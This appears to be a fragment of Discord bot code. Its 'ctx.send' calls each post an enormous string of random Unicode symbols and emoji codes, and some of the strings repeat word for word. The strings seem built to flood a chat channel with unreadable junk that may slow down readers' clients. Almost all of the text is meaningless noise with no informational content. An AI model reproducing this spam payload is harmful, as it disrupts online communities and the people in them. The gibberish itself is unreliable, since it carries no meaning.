ࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭ⏆ष᳼༊") await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭȝᙖ:") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന₹࢝") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ན